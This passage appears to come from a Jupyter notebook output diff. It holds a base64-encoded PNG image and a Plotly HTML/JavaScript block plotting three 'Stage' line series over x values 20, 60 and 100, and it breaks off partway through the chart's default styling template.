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9o4kaf6KLXqhVZqebdlJI6d8Ff1hr+U3bumjLsP1RLMUtWrbV9+cu2L4t6Bkx4E4EREREREREREREQUiDsSJiIiIiIiIiIiIKBBxIE5EREREREREREREgYgDcSIiIiIiIiIiIiIKRByIExEREREREREREVEg4kCciIiIiIiIiIiIiAIRB+JEREREREREREREFIg4ECciIiIiIiIiIiKiQMSBOBEREREREREREREFIg7EiYiIiIiIiIiIiCgQcSBORERERERERERERIGIA3EiIiIiIiIiIiIiCkQciBMRERERERERERFRIOJAnIiIiIiIiIiIiIgCEQfiRERERERERERERBSIOBAnIiIiIiIiIiIiokDEgTgRERERERERERERBSIOxImIiIgo6eXmHdXzb3ROyp/1drt+Wvz19qT8WQ+XzNeZaE2attFTzVPVrvto5eUX6snXUurl677xcW89+VqK/vZ/6fXy9YiIiIiILONAnIiIiIgeuRats9WkaZs4f3iprSTpuzt3dbSwKClf65cOxKfOX6tX389UTU1N3Oe+v/dAf3q1vbbsOvSrf3ZDOxA/e6FYkpJ+IH7ru++VNXSG/vfNz/RU8w76uOsInTp3Ofr5XfuPcyBORERERIGIA3EiIiIieuRatM7W+JkrVFx24yEVSf9av3Qgfv3mt/rDS22Vf+xM3OeWrt2hv7yZpnC46lf/7KAciH+aOUafZo5R0eVSlVyrUO8Rs/RCqzRFItWSOBAnIiIiouDEgTgRERERPXItWmdr7tJNv/j5nx407z5wQs3+
1UM52w7orU/66sW3u6pTr/G6dz8kSaqurtG46cvV9J10/enV9nq7XT8dPHo6+mf92iNTOmaPV/bwmXEff7/DII2ZtlSSVH7jljr3nqDn3+ispu+kq++o2bp770Hc69yYmx93KJzef4pGTF4sSRozban6jPxSg8cv0KvvZ6rpO+nanndEi7/epjc+7q0XWqXpy682RH+v88MaPH6Bnn+js55r2UntM8fqSsn1X/x39vCB+LMtOyk376heeT9TT76Wos96T9SDkPe7XsuiVdtUdr0y+s8Xr15Tk6ZtdP3mt5I4ECciIiKi4MSBOBERERE9co9yIJ6XX6g/vdpeI6d8pZqaGj0IeXrl/UwtWLFFkrQyZ7deaJWmi1evyXO+5izdqOf/0Tn67u5fOxDfsfeonmiWovsPvOjHfjzsvVxcrpqaGrVq21d9R83WvfshVX57Rx93HaG0PhPjXudvHYh/PmO5nn69gwpOnJMkTZi1Us+27KSp89ZIkvKPndF///0T3b5zT5I0dvoyfdRluCoqb8v5YU38cpVe+3dPVUUiP/t3efhA/IlmKeoz8kt9d+euissq9OLbXbVw5dbf9Vp+2p279zV4/AK93a6fqqt/eNwMB+JEREREFJQ4ECciIiKiR+5RD8SbNG0TczibPXymBn0+X9IP76T+7s7d6Odu37mnJk3b6FJxuaRfPxCvikT04ttdtTJnd/RjPx5ES9LJ0xfjvva+w6f0X39rq/sPvEc+EP9n6sDo5378e935/r4kKVwVUZOmbfTNuSuqqanRU81TdejY2eivj0Sq9eRrKTEf+2kPH4g3adpGld/eiX4+a+iM6L+zR3ktP+3lf3ZTk6Zt9FGX4TF/NgfiRERERBSUOBAnIiIiokeuRets/dff2uoPL8V6u10/SfEH4k80i30edr/Rc9R7xCxJ0p3v72vQ5/PV8qNeevmf3aKHtj8eDv/agbj0w7ujP+g8VNIPh84vvt1V67bukyRtyD2o/33zs5hfX1xWoSZN2+j8pdJHPhD/rPfE6OcOHTurP77cLubX/+GltjpaeF43b93+2R862qRpG63elPezf4+HD8T//Gr7X/x39iivJfbvfkOHj59VWp+JertdP3nOl8SBOBEREREFJw7EiYiIiOiRa9E6W2OmLlXR5dIYxWU3JMUfiD/8AyJ/eribPXym/tVpiG7eui1Junc/9EgH4iXXKqKPSNl94ISebdkpetC7Ifeg/vJmWsyvLy67oSZN26jo8m8fiHftNznmQPzHR61I//8Q+pVPY379j4fQld/eifk71Kbf+qGaDx+I1/a1/Fzhqoiefr2DNu88JIkDcSIiIiIKThyIExEREdEj96iPTPm1w91m/+oR88iTg0dPP9KBuCS16zZaX8xdrR5DpmnYxIXRjxeevRz3yJQ9B0/oDy+11YNQ7CNTduw9Gnd4/s/Ugb/rQFySnmreIfpO9R/76Q+2fLi6OhC/9d33avavHiq6XBr9XHV1jZ5+vYO27OJAnIiIiIiCFQfiRERERPTIJfNA/OOuI5Q9fKaqq2t08UqZOmR9rv/5ezvtOXhCUu0OxDftyNc/Puqlp5p30LmLJTGfe+fT/howdq4ehDxdv/mt/tVpiLoPmhr3Oi8Vl6tJ0zY6U3RVkrT7wAk91bzD7z4QHzt9mV7/MEuXi8sVropoyZpcPdeyU8wPAP1pdfkO8Q86D1XrtOE6e6FYpeU3NWLyYj3TomP0OeIciBMRERFRUOJAnIiIiIgeuWQeiBeevaw3Pu6tp5qn6qMuw1X8/9q5e5YuoDCMw9+nzZQgA8UhE0FBkCAQA8mXVCQECVs0FUTEpKmhwJfZr+Kg0CIugoNJ4FSmDo+D0CJBQsYf7utaz4HnnPXH4Rx/q3fLn+tR91jt7h/8VRC/vLyq1t6Jej4yf2vt6PikhqZXqunpq+rof1PvP2zVj5/nt85ZVfXxy0619U1V98DbWlzfrrnVjVpcv3lxftcIff7roubX
Nutxz3g97ByuF68Xau/r4R/vcJ9B/PT7Wc0sfKonvZPV0jVaA5NLtbt/8HuvIA4AQApBHAAAGsBd/xz/lwRxAABSCOIAANAABHEAALh/gjgAADSAB+0vq6VrpIamV/7r3J7B2Wp+NiyIAwAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABEEcQAAAAAAIgjiAAAAAABEEMQBAAAAAIggiAMAAAAAEEEQBwAAAAAggiAOAAAAAEAEQRwAAAAAgAiCOAAAAAAAEQRxAAAAAAAiCOIAAAAAAEQQxAEAAAAAiCCIAwAAAAAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABGuAWuGU1+u9CwfAAAAAElFTkSuQmCC",
+ "text/html": [
+ "<div> <div id=\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\" class=\"plotly-graph-div\" style=\"height:900px; width:100%;\"></div> <script type=\"text/javascript\"> require([\"plotly\"], function(Plotly) { window.PLOTLYENV=window.PLOTLYENV || {}; if (document.getElementById(\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\")) { Plotly.newPlot( \"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\", [{\"mode\":\"lines\",\"name\":\"Stage 1\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x3\",\"y\":[6725.0,7.75,-0.0],\"yaxis\":\"y3\"},{\"mode\":\"lines\",\"name\":\"Stage 2\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x2\",\"y\":[11787.5,226.93,0.62],\"yaxis\":\"y2\"},{\"mode\":\"lines\",\"name\":\"Stage 3\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x\",\"y\":[15425.0,576.31,161.68],\"yaxis\":\"y\"}], {\"height\":900,\"template\":{\"data\":{\"bar\":[{\"error_x\":{\"color\":\"#2a3f5f\"},\"error_y\":{\"color\":\"#2a3f5f\"},\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"bar\"}],\"barpolar\":[{\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"barpolar\"}],\"carpet\":[{\"aaxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"baxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"type\":\"carpet\"}],\"choropleth\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"choropleth\"}],\"contour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"
#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"contour\"}],\"contourcarpet\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"contourcarpet\"}],\"heatmap\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmap\"}],\"heatmapgl\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmapgl\"}],\"histogram\":[{\"marker\":{\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"histogram\"}],\"histogram2d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2d\"}],\"histogram2dcontour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2dcontour\"}],\"mesh3d\":[{\"colorbar\":{\"outlinewidth\":0,\"
ticks\":\"\"},\"type\":\"mesh3d\"}],\"parcoords\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"parcoords\"}],\"pie\":[{\"automargin\":true,\"type\":\"pie\"}],\"scatter\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter\"}],\"scatter3d\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter3d\"}],\"scattercarpet\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattercarpet\"}],\"scattergeo\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergeo\"}],\"scattergl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergl\"}],\"scattermapbox\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattermapbox\"}],\"scatterpolar\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolar\"}],\"scatterpolargl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolargl\"}],\"scatterternary\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterternary\"}],\"surface\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"surface\"}],\"table\":[{\"cells\":{\"fill\":{\"color\":\"#EBF0F8\"},\"line\":{\"color\":\"white\"}},\"header\":{\"fill\":{\"color\":\"#C8D4E3\"},\"line\":{\"color\":\"white\"}},\"type\":\"table\"}]},\"layout\":{\"annotationdefaults\":{\"arrowcolor\":\"#2a3f5f\",\"arrowhead\":0,\"arrowwidth\":1},\"autotypenumbers\":\"strict\",\"coloraxis\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"co
lorscale\":{\"diverging\":[[0,\"#8e0152\"],[0.1,\"#c51b7d\"],[0.2,\"#de77ae\"],[0.3,\"#f1b6da\"],[0.4,\"#fde0ef\"],[0.5,\"#f7f7f7\"],[0.6,\"#e6f5d0\"],[0.7,\"#b8e186\"],[0.8,\"#7fbc41\"],[0.9,\"#4d9221\"],[1,\"#276419\"]],\"sequential\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"sequentialminus\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0